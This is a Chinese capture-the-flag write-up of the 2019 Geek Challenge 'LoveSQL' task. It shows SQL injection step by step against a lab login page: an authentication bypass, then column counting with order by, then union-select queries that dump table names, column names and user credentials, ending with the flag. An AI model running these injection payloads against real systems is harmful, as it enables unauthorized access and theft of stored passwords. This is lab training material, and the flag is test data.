极客大挑战2019LoveSQL解析

（1）打开网页

（2）先尝试注入1’ or 1=1 #密码随便输一下

输出

（3）打开hackbar尝试使用order by语句从1开始查询列数

• 注：因为url中的#号是用来指导浏览器动作的，对服务器端无用，因此改为%23

  http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1'order by 4 ​%23 &password=12
  

直到4出错，因此判断一共有三列

（4）接下来使用union联合注入，先输入select 1,2,3得到

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1'union select 1,2,3 %23 &password=123

查询数据库

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1'union select 1,2,database() ​%23 &password=12

（5）从数据库中查询表名

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23 &password=123

（6）从l0ve1vsq1表中查询列名

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1' %23 &password=123

得到三列’id,username,password’

（7）从l0ve1vsq1表中查询’id,username,password’的值

http://f10e7b58-be63-4271-83e8-5b7250573c69.node4.buuoj.cn:81/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23 &password=123

爆出flag{411eec48-f88d-467b-8b1d-b2f876e10482}